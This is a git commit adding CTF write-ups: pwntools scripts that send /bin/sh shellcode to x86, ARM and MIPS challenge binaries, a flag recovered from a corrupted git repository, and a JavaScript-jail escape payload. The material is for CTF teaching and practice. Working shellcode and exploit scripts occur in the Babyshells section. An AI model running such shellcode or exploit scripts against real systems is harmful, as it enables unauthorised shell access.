Create README.md

carlnykvist · carlnykvist · commit 45c20c299547 · 2018-06-05T23:47:04.000+02:00
diff --git a/2018/babyshells/README.md b/2018/babyshells/README.md
@@ -0,0 +1,44 @@
+# Babyshells - Pwn
+> If you hold a babyshell close to your ear, you can hear a stack getting smashed
+
+In this task we were given three binaries, in x86, ARM and MIPS respectively. All of them jumped into our buffer so we can send the shellcode directly on all three binaries. Then each binary gives one third of the flag. 
+
+x86:
+```
+p=remote("52.30.206.11",7000)
+p.recvuntil("> ")
+p.sendline("1")
+p.recvuntil("gimme: ")
+exploit = ""
+exploit += "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80"
+p.sendline(exploit)
+p.interactive()
+```
+
+ARM:
+```
+from pwn import *
+ 
+p=remote("52.30.206.11",7001)
+p.recvuntil("> ")
+p.sendline("1")
+p.recvuntil("gimme: ")
+exploit = ""
+exploit += "\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x92\x1a\x02\x92\x78\x46\x0e\x30\x01\x90\x01\xa9\x04\x1c\x07\x34\x22\x60\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x41\xc0\x46"
+p.sendline(exploit)
+p.interactive()
+```
+
+MIPS:
+```
+from pwn import *
+ 
+p=remote("52.30.206.11",7002)
+p.recvuntil("> ")
+p.sendline("1")
+p.recvuntil("gimme: ")
+exploit = ""
+exploit += "\x28\x06\xff\xff\x3c\x0f\x2f\x2f\x35\xef\x62\x69\xaf\xaf\xff\xf4\x3c\x0e\x6e\x2f\x35\xce\x73\x68\xaf\xae\xff\xf8\xaf\xa0\xff\xfc\x27\xa4\xff\xf4\x28\x05\xff\xff\x24\x02\x0f\xab\x01\x01\x01\x0c"
+p.sendline(exploit)
+p.interactive()
+```
diff --git a/2018/diary/README.md b/2018/diary/README.md
@@ -0,0 +1,36 @@
+# Diary - Misc
+> We found a torn diary on the ground. It seems to belong to a local boy.
+
+In this challenge, we got a git repository. The first thing we can do is trying ````git log``` and we got the following
+```
+commit 2fec4e955704bd60292a9f9169f05c3334e555f4 (HEAD -> master)
+Author: Calle Svensson <calle.svensson@zeta-two.com>
+Date:   Sat Apr 14 02:22:52 2018 +0200
+
+    Added pencil to wishlist
+
+commit b182065ebc321a5432ab89be1ef2240077b3fbec
+Author: Calle Svensson <calle.svensson@zeta-two.com>
+Date:   Sat Apr 14 02:20:25 2018 +0200
+
+    April 14th
+error: Could not read afe5a9b6a373add54d07d874fb08edeec4a740da
+fatal: Failed to traverse parents of commit e7354a8187cd28c075e602f40380968d2865dcac
+```
+This reveals that the git repository is corrupted. We can try to use the Extractor tool from the following great repository: https://github.com/internetwache/GitTools
+
+After running the extractor bash script on the git repository, we look around in the files we got and the file ```1-4e9a1fe2aeb76cd0ab2c3d232691b714146b0475``` contains this content which reveals the flag:
+```
+Hello!
+
+This is my diary. There are many like it but this one is mine.
+
+April 9th
+Today was a good day. I ate some pie.
+
+April 10th
+I was a little bit sad today.
+
+April 11th
+Today I found a flag, it said: midnight{if_an_object_ref_falls_and_no_one_hears} that sounds very interesting.
+```
diff --git a/2018/jeil/README.md b/2018/jeil/README.md
@@ -0,0 +1,80 @@
+# Jeil - Web
+> You are awesome at breaking into stuff, how about breaking out?
+
+In this challenge, we need to break out of a Javascript jail. This is the source code of it:
+
+```
+var readline = require('readline');
+var rl = readline.createInterface(process.stdin, process.stdout);
+
+var Jail = (function() {
+    var rv = {};
+
+    function secretFuncUnguessable{{ENV_SECRET_0}}(a,b,c){
+        if(a === '{{ENV_SECRET_1}}' && b === '{{ENV_SECRET_2}}' && c === '{{ENV_SECRET_3}}'){
+            return true;
+        }
+    }
+
+    function call(code) {
+        var line = "";
+
+        if(new RegExp(/[\[\]\.\\\+\-\/;a-zA-Z{}`'"\s]/).test(code)){
+            console.log("Unrecognized code.");
+            throw 123;
+            return;
+        }
+
+        if(!(code.length == 32)){
+            console.log("Incorrect code length.");
+            throw 123;
+            return;
+        }
+
+        arguments = undefined;
+
+        ret = null;
+        ret = eval("this.secretFuncUnguessable"+code);
+
+        if(typeof ret == "function"){
+            if(ret.call(this,'{{ENV_SECRET_1}}', '{{ENV_SECRET_2}}', '{{ENV_SECRET_3}}') === true){
+                console.log("{{ENV_SECRET_FLAG}}");
+            }else{
+                console.log("Incorrect code.");
+            }
+        }else{
+            console.log("Incorrect code.");
+        }
+        throw 123;
+    };
+    rv.call = call;
+    rv.toString = function(){return rv.call.toString()};
+
+    return rv;
+})();
+
+template = `|￣￣￣￣￣￣￣￣|  
+|    Internal    |
+|＿＿＿＿＿＿＿＿|
+       ||
+(\\__/) || 
+(•ㅅ•) || 
+/ 　 づ  
+Code: `;
+
+function ask(){
+    rl.question(template,function(answer){
+        Jail.call(answer);
+    });
+}
+
+ask();
+```
+
+From this code, we can see that we need to fulfil the following:
+- input must be 32 bytes
+- chars must not be any of [\[\]\.\\\+\-\/;a-zA-Z{}`'"\s]
+- need ret to become a function which returns true
+
+Therefore, we remove the prefix by issuing it a value with = operator and random garbage. Then we use the ? ternary operator to get code execution again. Since the = operator returns true, we can use the "true case" of the ? operator to get code execution to create a lambda function with "=>". The payload that we needed was:
+```=1?_1=>1==1:11111111111111111111```
diff --git a/README.md b/README.md
@@ -0,0 +1,9 @@
+# writeups
+Solutions from multiple CTFs we have played
+
+# Practice
+- https://www.hackthebox.eu/
+- https://www.vulnhub.com/
+- https://www.root-me.org/
+- http://pwnable.kr/
+- https://ctftime.org/
